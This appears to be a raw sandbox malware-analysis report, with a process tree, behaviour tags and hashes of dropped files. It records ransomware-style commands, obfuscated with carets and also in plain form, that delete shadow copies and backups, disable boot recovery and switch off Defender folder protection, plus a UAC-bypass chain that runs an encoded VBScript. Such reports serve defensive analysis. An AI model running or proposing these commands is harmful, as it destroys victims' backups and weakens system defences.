C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,1428223295104939744,15713695179842939191,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5132 /prefetch:83⤵PID:2856
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,1428223295104939744,15713695179842939191,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4452 /prefetch:83⤵PID:4336
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,1428223295104939744,15713695179842939191,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1420 /prefetch:83⤵PID:4040
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,1428223295104939744,15713695179842939191,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=992 /prefetch:83⤵PID:2448
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,1428223295104939744,15713695179842939191,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1584 /prefetch:83⤵PID:1508
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,1428223295104939744,15713695179842939191,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4620 /prefetch:83⤵PID:5068
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,1428223295104939744,15713695179842939191,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1492 /prefetch:83⤵PID:1708
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,1428223295104939744,15713695179842939191,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4620 /prefetch:83⤵PID:2252
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,1428223295104939744,15713695179842939191,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5096 /prefetch:83⤵PID:1000
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,1428223295104939744,15713695179842939191,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1492 /prefetch:83⤵PID:2316
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Pictures\README.html2⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:5380 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x118,0x11c,0x120,0x40,0x124,0x7ffedaeb46f8,0x7ffedaeb4708,0x7ffedaeb47183⤵PID:5408
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2184,17896381788085709973,9385580609623388406,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2204 /prefetch:23⤵PID:5600
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2184,17896381788085709973,9385580609623388406,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2444 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
PID:5668
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2184,17896381788085709973,9385580609623388406,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2788 /prefetch:83⤵PID:5860
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,17896381788085709973,9385580609623388406,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3788 /prefetch:13⤵PID:6064
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,17896381788085709973,9385580609623388406,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3864 /prefetch:13⤵PID:6088
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2184,17896381788085709973,9385580609623388406,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5184 /prefetch:83⤵PID:3752
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2184,17896381788085709973,9385580609623388406,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5348 /prefetch:83⤵PID:5376
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,17896381788085709973,9385580609623388406,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5612 /prefetch:13⤵PID:5364
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,17896381788085709973,9385580609623388406,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5632 /prefetch:13⤵PID:5280
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2184,17896381788085709973,9385580609623388406,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4112 /prefetch:83⤵PID:4976
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings3⤵
- Drops file in Program Files directory
PID:3988 -
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff78c1e5460,0x7ff78c1e5470,0x7ff78c1e54804⤵PID:5964
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2184,17896381788085709973,9385580609623388406,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4112 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:6112
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2184,17896381788085709973,9385580609623388406,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5264 /prefetch:23⤵
- Suspicious behavior: EnumeratesProcesses
PID:3732
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:768
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3248
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3248 -s 9402⤵
- Program crash
PID:1648
-
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:3348
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Adds Run key to start application
PID:3412 -
C:\Windows\System32\cmd.exe/c ComputerDefaults.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2260 -
C:\Windows\system32\ComputerDefaults.exeComputerDefaults.exe3⤵
- Suspicious use of WriteProcessMemory
PID:2448 -
C:\Windows\system32\conhost.exe"conhost.exe" wscript /B /E:VBScript.Encode "../../Users/Public/TJOFMFRFMKKQ.sstz"4⤵
- Suspicious use of WriteProcessMemory
PID:3064 -
C:\Windows\system32\wscript.exewscript /B /E:VBScript.Encode ../../Users/Public/TJOFMFRFMKKQ.sstz5⤵PID:4596
-
-
-
-
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵
- Modifies registry class
PID:3500 -
C:\Windows\System32\cmd.exe/c ComputerDefaults.exe2⤵PID:280
-
C:\Windows\system32\ComputerDefaults.exeComputerDefaults.exe3⤵
- Modifies registry class
PID:1172
-
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
PID:3840
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of UnmapMainImage
PID:4896
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2204 -
C:\Windows\System32\MsiExec.exeC:\Windows\System32\MsiExec.exe -Embedding DA0103C894998C761A70859F6CDD4EA4 C2⤵
- Loads dropped DLL
- Adds Run key to start application
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4312 -
C:\Windows\System32\cmd.exe/c ComputerDefaults.exe3⤵
- Suspicious use of WriteProcessMemory
PID:2656 -
C:\Windows\system32\ComputerDefaults.exeComputerDefaults.exe4⤵
- Suspicious use of WriteProcessMemory
PID:3468 -
C:\Windows\system32\conhost.exe"conhost.exe" wscript /B /E:VBScript.Encode "../../Users/Public/TJOFMFRFMKKQ.sstz"5⤵
- Suspicious use of WriteProcessMemory
PID:3548 -
C:\Windows\system32\wscript.exewscript /B /E:VBScript.Encode ../../Users/Public/TJOFMFRFMKKQ.sstz6⤵PID:3128
-
-
-
-
-
-
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵PID:3372
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 452 -p 3248 -ip 32481⤵PID:2360
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Checks SCSI registry key(s)
PID:228
-
C:\Windows\system32\cmd.execmd /c WMI^C /Na^me^space^:\\ro^ot\Microsoft\^Windows\Def^en^de^r cla^ss M^SFT_^M^pP^r^eference ^c^all Set EnableControll^edFo^lder^Acce^ss^=^01⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:3564 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Set EnableControlledFolderAccess=02⤵PID:4852
-
-
C:\Windows\system32\cmd.execmd /c bcd^edi^t ^/set ^{defau^lt} boo^tstatuspol^i^cy ignor^ea^llf^a^ilur^es1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1656 -
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:424
-
-
C:\Windows\system32\cmd.execmd /c bcded^i^t /s^et {^def^ault^} recoveryenabled^ no1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1684 -
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:5088
-
-
C:\Windows\system32\cmd.execmd /c wm^ic^ s^h^ad^owco^py d^elet^e ^/n^o^in^teractive1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:3384 -
C:\Windows\System32\Wbem\WMIC.exewmic shadowcopy delete /nointeractive2⤵PID:4132
-
-
C:\Windows\system32\cmd.execmd /c wbadmin ^delete s^ys^te^m^sta^tebacku^p -^qu^i^e^t1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4768 -
C:\Windows\system32\wbadmin.exewbadmin delete systemstatebackup -quiet2⤵
- Deletes System State backups
PID:4324
-
-
C:\Windows\system32\cmd.execmd /c wbad^min de^let^e cat^alog^ ^-^quiet1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1468 -
C:\Windows\system32\wbadmin.exewbadmin delete catalog -quiet2⤵
- Deletes backup catalog
PID:3396
-
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵PID:4696
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:1376
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:2096
-
C:\Windows\system32\cmd.execmd /c bcd^edi^t ^/set ^{defau^lt} boo^tstatuspol^i^cy ignor^ea^llf^a^ilur^es1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4660 -
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:3984
-
-
C:\Windows\system32\cmd.execmd /c bcded^i^t /s^et {^def^ault^} recoveryenabled^ no1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1696 -
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:1120
-
-
C:\Windows\system32\cmd.execmd /c wm^ic^ s^h^ad^owco^py d^elet^e ^/n^o^in^teractive1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4292 -
C:\Windows\System32\Wbem\WMIC.exewmic shadowcopy delete /nointeractive2⤵PID:1528
-
-
C:\Windows\system32\cmd.execmd /c wbadmin ^delete s^ys^te^m^sta^tebacku^p -^qu^i^e^t1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:3152 -
C:\Windows\system32\wbadmin.exewbadmin delete systemstatebackup -quiet2⤵
- Deletes System State backups
- Drops file in Windows directory
PID:1676
-
-
C:\Windows\system32\cmd.execmd /c wbad^min de^let^e cat^alog^ ^-^quiet1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:3804 -
C:\Windows\system32\wbadmin.exewbadmin delete catalog -quiet2⤵
- Deletes backup catalog
PID:1160
-
-
C:\Windows\system32\cmd.execmd /c WMI^C /Na^me^space^:\\ro^ot\Microsoft\^Windows\Def^en^de^r cla^ss M^SFT_^M^pP^r^eference ^c^all Set EnableControll^edFo^lder^Acce^ss^=^01⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4604 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Set EnableControlledFolderAccess=02⤵PID:1056
-
-
C:\Windows\system32\cmd.execmd /c WMI^C /Na^me^space^:\\ro^ot\Microsoft\^Windows\Def^en^de^r cla^ss M^SFT_^M^pP^r^eference ^c^all Set EnableControll^edFo^lder^Acce^ss^=^01⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:3036 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Set EnableControlledFolderAccess=02⤵PID:2960
-
-
C:\Windows\system32\cmd.execmd /c bcd^edi^t ^/set ^{defau^lt} boo^tstatuspol^i^cy ignor^ea^llf^a^ilur^es1⤵
- Process spawned unexpected child process
PID:3808 -
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:1920
-
-
C:\Windows\system32\cmd.execmd /c wbad^min de^let^e cat^alog^ ^-^quiet1⤵
- Process spawned unexpected child process
PID:2448 -
C:\Windows\system32\wbadmin.exewbadmin delete catalog -quiet2⤵
- Deletes backup catalog
PID:1676
-
-
C:\Windows\system32\cmd.execmd /c bcded^i^t /s^et {^def^ault^} recoveryenabled^ no1⤵
- Process spawned unexpected child process
PID:4288 -
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:4432
-
-
C:\Windows\system32\cmd.execmd /c wbadmin ^delete s^ys^te^m^sta^tebacku^p -^qu^i^e^t1⤵
- Process spawned unexpected child process
PID:1632 -
C:\Windows\system32\wbadmin.exewbadmin delete systemstatebackup -quiet2⤵
- Deletes System State backups
PID:4076
-
-
C:\Windows\system32\cmd.execmd /c wm^ic^ s^h^ad^owco^py d^elet^e ^/n^o^in^teractive1⤵
- Process spawned unexpected child process
PID:2148 -
C:\Windows\System32\Wbem\WMIC.exewmic shadowcopy delete /nointeractive2⤵PID:2768
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3720
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:5300
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5816
-
C:\Program Files\Google\Chrome\Application\89.0.4389.114\elevation_service.exe"C:\Program Files\Google\Chrome\Application\89.0.4389.114\elevation_service.exe"1⤵
- Drops file in Program Files directory
PID:5872 -
C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5872_886862148\ChromeRecovery.exe"C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5872_886862148\ChromeRecovery.exe" --appguid={8A69D345-D564-463c-AFF1-A69D9E530F96} --browser-version=89.0.4389.114 --sessionid={20b0cec2-c000-4abc-adbc-9f0d6cae2d7a} --system2⤵
- Executes dropped EXE
PID:5964
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
111KB
MD57e2d1b4c7df25e54029dca08da8ab2f5
SHA1687d19684f9d341c43a8f6aaf25d302697bf1883
SHA2568ba539de44c7a5dd2f6e4b8a975c793db10c3ed87206d87f59f063de06eec7c3
SHA512003f9128ff15eb6673d8d0c9a1beee1e189912a97632b02dbf68934d04412746272d62d682276a928fe3e74e6df6689001b74677faf5254d0c264172ee6f2fe3
-
Filesize
141KB
MD5ea1c1ffd3ea54d1fb117bfdbb3569c60
SHA110958b0f690ae8f5240e1528b1ccffff28a33272
SHA2567c3a6a7d16ac44c3200f572a764bce7d8fa84b9572dd028b15c59bdccbc0a77d
SHA5126c30728cac9eac53f0b27b7dbe2222da83225c3b63617d6b271a6cfedf18e8f0a8dffa1053e1cbc4c5e16625f4bbc0d03aa306a946c9d72faa4ceb779f8ffcaf
-
Filesize
70KB
MD5e5e3377341056643b0494b6842c0b544
SHA1d53fd8e256ec9d5cef8ef5387872e544a2df9108
SHA256e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25
SHA51283f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{95f5c8a3-5207-4e8d-a4ac-1fe00940deb0}\apps.csg
Filesize444B
MD55475132f1c603298967f332dc9ffb864
SHA14749174f29f34c7d75979c25f31d79774a49ea46
SHA2560b0af873ef116a51fc2a2329dc9102817ce923f32a989c7a6846b4329abd62cd
SHA51254433a284a6b7185c5f2131928b636d6850babebc09acc5ee6a747832f9e37945a60a7192f857a2f6b4dd20433ca38f24b8e438ba1424cc5c73f0aa2d8c946ff
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{95f5c8a3-5207-4e8d-a4ac-1fe00940deb0}\apps.schema
Filesize150B
MD51659677c45c49a78f33551da43494005
SHA1ae588ef3c9ea7839be032ab4323e04bc260d9387
SHA2565af0fc2a0b5ccecdc04e54b3c60f28e3ff5c7d4e1809c6d7c8469f0567c090bb
SHA512740a1b6fd80508f29f0f080a8daddec802aabed467d8c5394468b0cf79d7628c1cb5b93cf69ed785999e8d4e2b0f86776b428d4fa0d1afcdf3cbf305615e5030
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{95f5c8a3-5207-4e8d-a4ac-1fe00940deb0}\appsconversions.txt
Filesize1.4MB
MD52bef0e21ceb249ffb5f123c1e5bd0292
SHA186877a464a0739114e45242b9d427e368ebcc02c
SHA2568b9fae5ea9dd21c2313022e151788b276d995c8b9115ee46832b804a914e6307
SHA512f5b49f08b44a23f81198b6716195b868e76b2a23a388449356b73f8261107733f05baa027f8cdb8e469086a9869f4a64983c76da0dc978beb4ec1cb257532c6b
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{95f5c8a3-5207-4e8d-a4ac-1fe00940deb0}\appsglobals.txt
Filesize343KB
MD5931b27b3ec2c5e9f29439fba87ec0dc9
SHA1dd5e78f004c55bbebcd1d66786efc5ca4575c9b4
SHA256541dfa71a3728424420f082023346365cca013af03629fd243b11d8762e3403e
SHA5124ba517f09d9ad15efd3db5a79747e42db53885d3af7ccc425d52c711a72e15d24648f8a38bc7e001b3b4cc2180996c6cac3949771aa1c278ca3eb7542eae23fd
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{95f5c8a3-5207-4e8d-a4ac-1fe00940deb0}\appssynonyms.txt
Filesize237KB
MD506a69ad411292eca66697dc17898e653
SHA1fbdcfa0e1761ddcc43a0fb280bbcd2743ba8820d
SHA2562aa90f795a65f0e636154def7d84094af2e9a5f71b1b73f168a6ea23e74476d1
SHA512ceb4b102309dffb65804e3a0d54b8627fd88920f555b334c3eac56b13eeb5075222d794c3cdbc3cda8bf1658325fdecf6495334e2c89b5133c9a967ec0d15693
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{95f5c8a3-5207-4e8d-a4ac-1fe00940deb0}\settings.csg
Filesize454B
MD5411d53fc8e09fb59163f038ee9257141
SHA1cb67574c7872f684e586b438d55cab7144b5303d
SHA2561844105bb927dbc405685d3bf5546be47fa2fc5846b763c9f2ba2b613ec6bc48
SHA51267b342c434d8f3a8b9e9ac8a4cbd4c3ef83ddfc450fe7e6ad6f375dba9c8a4977a15a08b49f5ad7644fbde092396e6da08865aa54d399836e5444cb177a33444
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{95f5c8a3-5207-4e8d-a4ac-1fe00940deb0}\settings.schema
Filesize162B
MD5ac68ac6bffd26dbea6b7dbd00a19a3dd
SHA1a3d70e56249db0b4cc92ba0d1fc46feb540bc83f
SHA256d6bdeaa9bc0674ae9e8c43f2e9f68a2c7bb8575b3509685b481940fda834e031
SHA5126c3fcce2f73e9a5fc6094f16707109d03171d4a7252cf3cb63618243dbb25adb40045de9be27cad7932fd98205bdaf0f557d282b2ba92118bba26efcf1cd2a02
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{95f5c8a3-5207-4e8d-a4ac-1fe00940deb0}\settingsconversions.txt
Filesize520KB
MD5721134982ff8900b0e68a9c5f6f71668
SHA1fca3e3eb8f49dd8376954b499c20a7b7cad6b0f1
SHA2562541db95c321472c4cb91864cdfa2f1ed0f0069ac7f9cec86e10822283985c13
SHA5125d1c305b938e52a82216b3d0cee0eead2dc793fac35da288061942b2bd281fb48c7bd18f5fdaa93a88aa42c88b2a0cce1f0513effb193782670d46164d277a59
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{95f5c8a3-5207-4e8d-a4ac-1fe00940deb0}\settingsglobals.txt
Filesize43KB
MD5bbeadc734ad391f67be0c31d5b9cbf7b
SHA18fd5391c482bfbca429aec17da69b2ca00ed81ae
SHA256218042bc243a1426dd018d484f9122662dba2c44a0594c37ffb3b3d1d0fb454a
SHA512a046600c7ad6c30b003a1ac33841913d7d316606f636c747a0989425697457b4bc78da6607edd4b8510bd4e9b86011b5bd108a5590a2ba722d44e51633ed784f
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{95f5c8a3-5207-4e8d-a4ac-1fe00940deb0}\settingssynonyms.txt
